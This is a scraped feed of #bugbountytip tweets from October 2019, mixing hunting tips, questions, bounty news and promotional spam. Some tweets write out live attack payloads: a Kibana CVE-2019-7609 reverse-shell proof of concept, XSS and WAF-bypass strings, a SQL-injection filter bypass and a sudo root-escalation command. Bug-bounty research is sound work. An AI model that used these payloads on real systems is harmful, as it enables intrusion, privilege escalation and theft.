0 PHP Execution 0-Day Discovered in Real World CTF Exercise https://t.co/VPLYXj5f1u #bugbountytip
Λявєη
@spenkkkkk


2019-10-28 09:32:16
0 Does subdomain takeover work for https://t.co/3MKBF2BrBG? #bugbounty #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-28 06:35:00
0 Does anyone know what is going on here... I'm getting multiple profiles of Google HOF @GoogleVRP #bugbounty #bugbountytip #bugbountytips #bugbountyhelp #togetherwehitharder #google #hacking https://t.co/VOPcbCghWi
miraitowa
@miraitowa1


2019-10-28 00:26:07
1 Hacking JSON Web Tokens (JWTs) by @vickieli7 https://t.co/xR60oBxe7d #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-27 21:17:25
1 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Mahmoud Osama
@Mahmoud0x00


2019-10-27 16:34:59
3 #bugbountytip if you could to reach out to AWS credentials, Configure them in your terminal and then list s3 buckets `aws s3 ls` look for buckets with `AMAZON_SES_SETUP_NOTIFICATION` file, then you will have access to all emails got sent to this email + Ticket trick,You are in!!
Hendrik
@hendrikvb


2019-10-27 13:21:54
0 Silly @Burp_Suite trick of the day: Use advanced scope control for auto-scoping and unscoping, based on regex for ports, files, ports and protocols. #Burp #bugbountytip
SΛKYB
@sakyb7


2019-10-27 08:22:50
0 Hey guys, having hard time to understand http smuggling request.. portswigger web security challenge Video solutions: https://t.co/hZ8CGt6V61 (Basic CL TL Vulnerability) Find all solutions on this YT channel #bugbountytip #bugbounty
tololovejoi
@tolo7010


2019-10-27 01:55:07
0 Security is not so hard. You just need to know the concept #bugbounty #bugbountytip
Learner
@LearnerHunter


2019-10-27 01:06:18
1 Hello friends here is my new blog post in Bug Bounty Writeup Summary -> Please give suggestions/ideas after read Thanks https://t.co/wm0JvWB6Qt #bugbountytip #bugbounty
m0z
@LooseSecurity


2019-10-26 17:43:52
0 The best hacking tool is your brain. Train it! :D #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-26 16:44:55
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Sayaan Alam
@alamsayaan


2019-10-26 13:38:23
0 @lcblnc I had found a domain where Access control allow origin - true X frame option - sameorigin... Is it exploitable ...if yes then how.. #bugbounty #bugbountytips #bugbountytip #togetherwehitharder
bugbountytip
@a_l_e_r_t_1_


2019-10-26 13:06:43
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ammar Amer🇸🇾
@cry__pto


2019-10-26 10:06:16
3 free udemy courses for a limited time: -1-Master in Hacking with Metasploit: https://t.co/I25d3rBV6r -2-master object oriented php by building a web-application: https://t.co/5wJKzj2Tf0 #bugbountytip #hacking #pentest #cybersecurity #RedTeam #infosec
bugbountytip
@a_l_e_r_t_1_


2019-10-26 08:30:57
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
epxil0n
@lcblnc


2019-10-26 08:10:29
0 ClickJacking is present when these two headers are found. Access-Control-Allow-Origin: * X-Frame-Options: SAMEORIGIN #bugbountytips #bugbountytip #bugbounty
dark_warlord14
@dark_warlord14


2019-10-26 07:51:40
0 Scored my first bounty today on @Hacker0x01. Thank you @zseano @TomNomNom @brutelogic @NahamSec @s0md3v . Your work and notes have helped me to achieve this. #bugbountytip #bugbountytips https://t.co/2uJdRMwnGu
tololovejoi
@tolo7010


2019-10-26 05:36:02
0 A hacker ends his career when he stop learning new things. A company ends their bug bounty program when they stop developing new features. #bugbounty #bugbountytip
Pavandeep
@Pavandep8


2019-10-26 04:23:59
0 Look what I shared: Bypassing CORS - Saad Ahmed - Medium @MIUI| #bugbountytip #Hackers #security @infosecgirls https://t.co/Q8f8YDHFQv
Bibek Shah
@noobibek


2019-10-26 01:18:24
0 BugBounty Tip : If you see "call me" option while 2FA. Click it and check response, it might leak some sensitive info of the account. #bugbountytip #infosec
m0z
@LooseSecurity


2019-10-26 00:23:21
2 more information = more bugs #bugbountytips #BugBounty #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-25 22:51:40
0 The Shortest web shell #bugbountytip #rce https://t.co/wy7H21XL1r
Salah Baddou
@chmodxxx


2019-10-25 22:48:11
0 Whoops forgot to #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-25 22:27:30
0 Now 25+ download. Thank you !!! Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ashkan
@11xuxx


2019-10-25 20:35:41
0 Trouble using aquatone? Try it like this: cat target.txt | ./aquatone -scan-timeout 500 -screenshot-timeout 300000 -http-timeout 30000 #bugbountytip
intigriti
@intigriti


2019-10-25 11:48:27
9 Sometimes, one character is all you need! Use % as a wildcard for codes, booking references or even SSN's! 🃏 Awesome #BugBountyTip, @itscachemoney! 👏 https://t.co/bDPq2uINaF
tololovejoi
@tolo7010


2019-10-25 11:14:35
1 The best tools for finding vulnerability are failure, patience, and dedication #bugbounty #bugbountytip
testter
@testter57721185


2019-10-25 09:35:27
0 #bugbountytips #bugbountytip Does knowing the ssokey of the user account constitute a security vulnerability ?
haqpl
@haqpl


2019-10-25 06:27:00
0 #bugbountytip Another trick to cause unexpected behavior of web app is to change the type of variable to an array by adding [] as a suffix to its name: ?var[]=1
lopseg
@lops3g


2019-10-25 03:04:50
0 Recently, I was looking for an XSS payload without spaces and slashes, but I didn't find one that worked. I built the below, it worked like a charm: <svg%0aonload=alert()> #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-25 02:32:29
0 Yay... Got My First Bounty of $500 From Google.... The Way HOF Started #bugbounty #bugbountytip #hacking #togetherwehitharder .. Motivated By - @_jensec @ehsahil @sehacure @logicbomb_1 https://t.co/pEosbaurZO
bugbountytip
@a_l_e_r_t_1_


2019-10-24 20:02:23
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-24 13:40:51
0 Bypass Uppercase filters like a PRO (XSS Advanced Methods) https://t.co/WSvDTsESMe #poc,#bugbountytip,#bugbounty,#hacking,#cybersecurity,#infosec
intigriti
@intigriti


2019-10-24 12:44:30
12 The best way to cause errors exposing sensitive information? ➡️Long strings in POST parameters (50.000+ characters) ➡️Using the 'Euler number' (e) in numbers to gain exponentially large values Thanks for the #BugBountyTip, @pxmme1337! https://t.co/gPJ37I6o7z
Emre Selim
@emre_selim8


2019-10-24 12:44:29
0 Does BugCrowd pay bounty for "Won't Fix" Bugs? #BugBounty #BugBountyTip #BugCrowd
Sayaan Alam
@alamsayaan


2019-10-24 09:10:40
0 Hello Infosec Community.... So Guys Let's Everyone Share Their High school percentage.....Many Newbies Will Get Idea Who Thinks that they are not doing good... #bugbounty #bugbountytip #togetherwehitharder #ethical #hacking #hackerone #bugcrowd #cybersecurity
Yadhavi
@PrincessYadhavi


2019-10-24 08:53:30
0 How to hack Rabbitmq? #bugbounty #bugbountytips #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-24 07:45:30
0 It was a Nice One... #bugbounty #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZOnkntsAvW
Henry Chen
@chybeta


2019-10-24 03:45:06
3 NOTICE THIS TWEET : https://t.co/x68iNP6F7u recommended configuration for nextcloud with nginx and php-fpm is vulnerable... #bugbounty #bugbountytip #bugbountytips https://t.co/cAqptRR0Ez
Håkon Lønmo
@WriteAV


2019-10-23 17:08:48
0 Just made the @visma hall of fame for security researchers. #bugbountytip, no bounty though :-)
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:39:28
3 We always talk about methodology to find subdomains, but what about domains first ? What if you want to enlarge your scope, I use https://t.co/nTkWllAwGH https://t.co/VP7PDYC7VZ https://t.co/PfUAtO6Okp https://t.co/35MVruXUTz to find more domains owned by a company #bugbountytip
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:05:49
1 Using @Hackerone as a recon tool. Some companies use formatted nicknames for team members/bots which is nice to find private programs you're not invited. Check the huge sitemap. #bugbountytip https://t.co/fILuM5WpDF
bugbountytip
@a_l_e_r_t_1_


2019-10-23 10:27:54
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #
Karna
@karna__1


2019-10-23 08:34:50
0 I forgot to take my laptop today and was super bored at my office. So I installed Termux (Android terminal) and started running my recon tools 😂🔥 Hit Termux if you forget your laptop! #bugbountytip #bugbountytips What other Android tools do you use @s0md3v https://t.co/fUPLoMGlk7
bugbountytip
@a_l_e_r_t_1_


2019-10-23 06:46:20
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Eduard Tolosa
@Edu4rdSHL


2019-10-22 20:27:50
2 Nice article explaining how to get Findomain working in Windows. It's recommended for any user that want to use your Windows OS for security testing. #BugBounty #bugbountytip #enumeration #subdomains #recon #hacking https://t.co/PT8G1B1Gyr
Aziz Hakim
@hackerb0y_


2019-10-22 19:50:46
0 #bugbountytip Create a mind map && make your own recon list #infosec #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 18:50:53
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
bugbountytip
@a_l_e_r_t_1_


2019-10-22 17:48:56
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Murdockz
@Murdockz_CEH


2019-10-22 16:53:20
0 I earned $2,000 for my submission on @bugcrowd https://t.co/1IfbGhMzx1 #ItTakesACrowd API endpoint to create a new user account -> No Auth Token -> Created admin account with @target.com domain -> Admin Account Takeover. #bugbounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2019-10-22 15:40:57
0 Build a custom wordlist for each dirsearch #recon, to include robots.txt, sitemap and spidered paths. #bugbountytip #BugBounty
Aashish Yadav
@aa5h15h


2019-10-22 15:34:08
2 Redis Unauthorized Access Vulnerability Simulation https://t.co/VvAv50TepM #bugbounty #bugbountytip #devops #linux #unix #windows #programmer #programming #like #retweet #followme #follow #python #php #java #redis #oscp https://t.co/m6EzTxV8G0
Luthra
@team0xL


2019-10-22 12:59:22
0 Awarded $1,000 bounty #bugbountytip Sometimes expired domain can help you to get juicy stuff. So, bruteforce the subdir on expired domain #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 10:43:58
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Dawood Ikhlaq
@daudmalik06


2019-10-22 09:20:47
0 Found SQLI ? App is protected with incapsula waf by @Imperva ? blocking sleep keyword ? 😀 Just found the bypass of latest incapsula WAF sle%25p%28'0x12'%2b1) => sleep('ox12' + 1) write-up coming soon.. #sqli #bugbountytip @Imperva #incapsula #waf
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-22 06:25:29
1 from @EdOverflow : Thanks for the amazing #bugbountytip - https://t.co/zGwejuI2Xy
florens
@florens25301329


2019-10-21 23:25:58
0 Has anyone got any resources on XPath injection? #BugBounty #bugbountytip
Anshuman Pattnaik
@anspattnaik


2019-10-21 18:14:46
0 #bugbountytip #BugBountyTips I am trying to Smuggle an HTTP request with https://t.co/eVHtHgJ1d3 but in the response 411 status code "No Content-Length". Payload (Tried many other too) Content-Length: 5 Transfer-Encoding: cow chunked bar 0 Can you please suggest me any tips?
bugbountytip
@a_l_e_r_t_1_


2019-10-21 16:54:02
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-21 11:46:01
0 Recon resources Best article from @PentesterLand https://t.co/psZ1iens0p #bugbounty,#bugbountytip,#hacking,#infosec
Henry Chen
@chybeta


2019-10-21 11:41:06
8 writeup: ..%3B -> tomcat manager -> getshell https://t.co/ZEvOjcDhw8 #bugbounty #BugBountyTips #bugbountytip https://t.co/NBjLRgiaIt
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 10:22:03
0 #BUGBOUNTYTIP - When in Doubt , Enumerate ! Be Persistent! 🎖💸💸 💰💰💰💰 #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:59
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/kVnk39ItNa
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:45
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/KfndxlL7zs
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:34
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/Or6ej2AaAo
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:21
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/le5tIA5Nqm
Imran Parray
@CreedHackers


2019-10-21 09:14:19
0 When it comes to API testing finding new endpoints is one of the important technique that shouldn't be ignored at all. But most of the people do it wrong. Recursion techniques can be combined with endpoint extracting tools to get best out of them. #bugbountytip #cybersecurity https://t.co/ACV6BZXWt7 https://t.co/lLOhjFFPQj
Ammar Amer🇸🇾
@cry__pto


2019-10-20 15:22:12
4 free udemy courses for a limited time about : -1-hacking:https://t.co/lNIWJMNiM4 -2-malware:https://t.co/AaTAC6Av1U -3-upowork:https://t.co/FJBRRDzCnW -4-NGINX:https://t.co/XIOzfR8GWh #bugbountytip #hacking #malware #infosec #cybersecurity #PenTest #Linux
Max
@0xw2w


2019-10-20 13:15:43
1 Bug bounty tip: Always check allowed websites in CSP policy. There is a chance, that domain/bucket is not claimed or CSP pointing to file hosting. For example, I once found CSP was pointed to https://t.co/a5bttaghT7. #bugbountytip #togetherwehitharder
Saurav
@amian_saurav


2019-10-20 12:40:27
0 Finding deep level domains through simple dorking. site:*.site.com-www site:*.*.site.com-www site:*.*.*.site.com-www #BugBountyTips #BugBounty #bugbountytip
Henry Chen
@chybeta


2019-10-20 10:09:32
7 CVE-2019-7609 If you can't pop a shell via the last tweet , you can change poc like 👇 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//') #BugBountyTips #BugBounty #bugbountytip https://t.co/BaeSZwDbGu https://t.co/XLGHJnxT0Y
Kenan
@h1_kenan


2019-10-20 07:52:45
5 KONA #WAF #bypass #XSS #bugbountytip asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie) enjoy 😉👍
baaay
@abaykandotcom


2019-10-20 06:32:39
0 CodeLabs took the initiative to make it easier for you who want to learn XSS by making a 'labs' where anyone can try and/or learn XSS in a basic way. #xss #BugBounty #BugBountyTips #bugbountytip https://t.co/WIMJZS6pnj https://t.co/bJNfFdJutr
Kom[S]REd
@jauharali


2019-10-20 06:23:12
0 “A Study of Security Headers — Learning Notes” by Kom[S]REd https://t.co/YRKFYCnPX1 #pentest #bugbountytip #security
Eduard Tolosa
@Edu4rdSHL


2019-10-20 01:40:23
1 Findomain 0.6.0 is out! New features: * Option to discover subdomains IPs and save to file * Option to use quiet mode to remove informative messages * Add ability to save new domains found in a TXT file while monitoring. Please RT https://t.co/tkgBfKirNP #BugBounty #bugbountytip
Sudoka
@sudo_sudoka


2019-10-19 17:32:48
0 Analysis of #CVE-2019-16278, an #unauthenticated remote code execution in the Nostromo web server, aka nhttpd, a popular open-source web server in BSD systems. All versions up to the latest release 1.9.6 are vulnerable. Path traversal to RCE! #bugbountytip https://t.co/tzL9YrLXzI
Wareeq🕸🐁
@wareeq_shile


2019-10-19 17:05:36
0 Kindly subscribe and like their content @nvisium https://t.co/z5FtAQg8YC can we get a retweet? #BugBounty #bugbountytips #bugbountytip
John mash
@Techhelplistcom


2019-10-19 17:00:01
0 i have uploaded 126 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/fNomAu16P2 https://t.co/3SQwGkXxII
Ammar Amer🇸🇾
@cry__pto


2019-10-19 16:12:30
11 i have uploaded 126 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/q2layzVpKz https://t.co/7o4QgYRMvC
Shlomie Liberow
@Shlibness


2019-10-19 13:38:21
0 Submitted an HTTP Smuggling attack and was initially rejected on low impact but found a /redirect endpoint which followed a poisoned referer header. Since I was able to set poisoned headers to an external host... #bugbountytip https://t.co/kxBCsU2Y9d
A hacker's life
@Unknownuser1806


2019-10-19 12:47:41
0 From Multiple IDORs leading to Code Execution on a different Host Container https://t.co/v519vssv7q #bugbountytips,#bugbountytip,#cybersecurity,#infosec
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-19 12:42:04
0 Finally! Reported First XSS of my life 😅 on one of the private program @Hacker0x01. The application was sanitizing alert, script, ", etc But following payload got me through! <svg/onload=prompt (1)> #bugbountytips #bugbounty #bugbountytip
Nick (or hunt4p1zza)
@ngkogkos


2019-10-19 11:35:48
0 Just ate a well-known WAF for breakfast. <form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));// See picture for detailed explanation and tips. #bugbounty #bugbountytip Kudos: @PortSwiggerRes, @brutelogic, @wugeej . https://t.co/4Phkolgoso
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:33:51
3 🛡 « https://t.co/ItNKqoJWJC\%3C/onscroll/=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))%3E Try this one. ⛑ dot shot. 💣 » #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:29:33
10 cloudflare «XSS» payload to bypass protection. 🦍 {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} #BugBounty #BugBountyTip #WAF #infosec
Sanketh Sharath
@sharathsanketh


2019-10-19 02:06:37
1 1st 4 1/2 months of bug bounty hunting: 1st bug-N/A 2nd -Dupe 3rd -Bounty 4th -Dupe 5th -No reply 6th -Dupe 7th -Dupe (this was a P2!) 8th -Won't fix This is tough,need to keep going! I believe tough times don't last! #bugbounty #bugbountytips #bugbountytip
Miguel Gonzales Jimenez
@z3r0cool


2019-10-19 01:39:08
1 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/FyAQ2tDzaL #bugbounty,#bugbountytip
Ishaq Mohammed
@security_prince


2019-10-18 16:15:41
0 @TheR0oT @nightwatch1337 This is one of the nicest #bugbountytip #bugbountytips for the #bugbounty hunters @Hacker0x01 @Bugcrowd @intigriti
Yadhavi
@PrincessYadhavi


2019-10-18 14:44:01
0 Any way to add custom headers to aquatone when screenshotting? #bugbounty #bugbountytips #aquatone #bugbountytip
intigriti
@intigriti


2019-10-18 11:47:03
7 Want to find 'cosmic brain' bugs, just like @0xACB and @samwcyo? 🤯 Use the following 'invisible' ranges in your payloads 👇#BugBountyTip 💥0x00 ➡️0x2F 💥0x3A ➡️0x40 💥0x5B ➡️0x60 💥0x7B ➡️0xFF https://t.co/B2WlIjEJXu
Ishaq Mohammed
@security_prince


2019-10-18 05:06:56
1 HTML5 storage manipulation (stored DOM-based) by @PortSwigger @PortSwiggerRes https://t.co/2DRcHzMwS3 #AppSec #xss #bugbountytip #bugbounty
Gopalsamy ( கோபால்சாமி )
@gopalsamy_


2019-10-18 03:19:31
0 Dear #infosec friends. Give me a suggestion, how you people are running #kalilinux tools on #ubuntu 🤗 please leave a comment below about the method that ur using :) #linux #ubuntu #bugbounty #bugbountytip #redteam #cybersecurity #hacking #hackers
A hacker's life
@Unknownuser1806


2019-10-18 02:43:25
0 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/sR7l2pnYH4 #bugbounty,#bugbountytip
Security Executions Code
@pwn0sec


2019-10-17 16:52:51
1 LIVE with Staf_SecurityPwn @andripwn Penetration Testing Introduction: Exploit & Reconnaissance https://t.co/EWBLAklv8D #bugbounty #bugbountytips #bugbountytip #hackerone #pwn0sec
bugbountytip
@a_l_e_r_t_1_


2019-10-17 06:00:53
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
John mash
@Techhelplistcom


2019-10-17 05:00:01
1 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/fNomAu16P2 https://t.co/R0WwN7R4Ah
Bhojpuri Chumma
@BChumma


2019-10-17 03:04:45
0 RT @cry__pto: i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytip…
👻in🐚
@0xerror


2019-10-17 02:05:13
0 XSS News: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/mMIF2uJKPG, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-10-17 02:05:12
0 Top story: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/GJk0qJDMBC, see more https://t.co/fVnXn9Z0FJ
Ammar Amer🇸🇾
@cry__pto


2019-10-17 01:49:56
2 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/PvL7gXzXKW
Nikhith
@Nikhith_


2019-10-16 19:54:37
0 I just wrote a blog post on #CVE-2019-17662 I found. This is a vulnerability I found in ThinVNC server. An arbitrary file read --> authentication bypass --> Full #VNC access. Can be helpful on a PT / Bug Bounty Read at: https://t.co/ASzbpcGwiE #InfoSec #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-10-16 19:21:33
0 Use the organization field in a ssl certificate to find domain names associated with a company , you can use censys to perform such a task ... #bugbountytip #reconnaissance https://t.co/42vjFALFhq
Karna
@karna__1


2019-10-16 15:30:19
0 I'm serious. It's a #bugbountytip #bugbountytips #infosec #humans https://t.co/F7s0ZB0lFK
bugbountytip
@a_l_e_r_t_1_


2019-10-16 12:57:17
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #bughunters
bugbountytip
@a_l_e_r_t_1_


2019-10-16 10:37:51
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf
bugbountytip
@a_l_e_r_t_1_


2019-10-16 08:52:27
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
m0z
@LooseSecurity


2019-10-15 23:25:51
0 I get asked lots of #BugBounty questions, and one I'm always asked is "Is X valid bug" or "I reported X and it was out of scope". The answer is to read the program's scope before reporting. I know it's not always obvious, but the answer is there... #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-15 17:26:34
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-15 16:04:43
1 The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss https://t.co/BBtdSvmYt6
ironfist
@ironfisto


2019-10-15 15:59:35
0 Not great tip but you might land cassanra cluster in connection tab of datastax studio. Shodan search-> html:datastax #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-15 12:56:16
7 #bugbountytip #bugbounty This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location. https://t.co/ODpUpWRypc
Infected Drake
@0xInfection


2019-10-15 11:33:41
1 I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to @har1sec for the assignment. :) #infosec #bugbountytip https://t.co/BnB2fqVdTd
Random Robbie
@Random_Robbie


2019-10-15 06:35:58
2 inside a container.... limited privs? SUDO!!!! https://t.co/ocd7FodNqp sudo -u#4294967295 id uid=0(root) gid=1002(robbie) groups=1002(robbie) sudo -u#4294967295 whoami root #bugbountytip #escapethcontainer
hyperdummy
@dummyclout


2019-10-15 05:15:54
0 ping for vis. any thoughts? #bugbounty #bugbountytip
Pat.
@PuzzledPat


2019-10-15 03:22:57
0 @MacRumors, check out the year 2038 in your iPhone calendar.. notice that #Apple have given July and April some extra months. #bugbountytip https://t.co/Wrk7TEexIS
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-15 03:13:31
0 Morning Like this! #bugbounty #bugbountytip https://t.co/DsshG2nqAw
ً
@GouveaHeitor


2019-10-14 12:51:12
1 If you found a possible IDOR like: http://host/api/AccountID=123 But it is being blocked when you pass an ID from another account, try bypass it making a parameter pollution like: http://host/api/AccountId=123&AccountId=456 #bugbountytip
Ankush Goel
@0xankush


2019-10-14 06:53:27
0 If your are not automating and scripting, you are missing on a lot of fun. It's all about time management in #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-13 18:53:47
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #cybersecurity #ceh #eccouncil #certification https://t.co/0gfcgW7uTM https://t.co/mzllE9lUqq
Ammar Amer🇸🇾
@cry__pto


2019-10-13 16:37:03
7 i have uploaded 74 new articles as a pdf files about different fields of hacking+ linux,cybersecurity,,,etc. to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/XE81lBik5M
Garth Humphreys
@garthhumphreys


2019-10-13 16:16:36
0 #Random thought: Is it #dups or #dupes ? #BugBounty #bugbountytip #infosec
Security Executions Code
@pwn0sec


2019-10-13 15:38:36
0 Bug Bounty ATT : Server-Side Request Forgery (SSRF) https://t.co/hjQLeWxwIS #bugbounty #bugbountytip #bugbountytips #ssrf #hackerone #att
ahamed morad
@Modam3r5


2019-10-13 15:06:47
2 this is one of my reports that I think let me win by the invitation. #bugbountytip https://t.co/fCcnzDat6I
Harsh kumar
@Harshku21974218


2019-10-13 12:37:58
1 Bypassing the WebARX Web Application Firewall (WAF) https://t.co/n09E8OhI2K #cybersecurity #bugbountytip
Evan Custodio
@defparam


2019-10-13 03:02:20
0 By using the boundary "SmuggleThis"+colon I could end the dangling part anywhere in the headers (could be handy). When I went to go check and see if "test.txt" was written to the server I was happy to see I had smuggled my own request and found the CDN headers. #bugbountytip https://t.co/BxYMvBYlsB
ghostlulz
@ghostlulz1337


2019-10-13 02:11:51
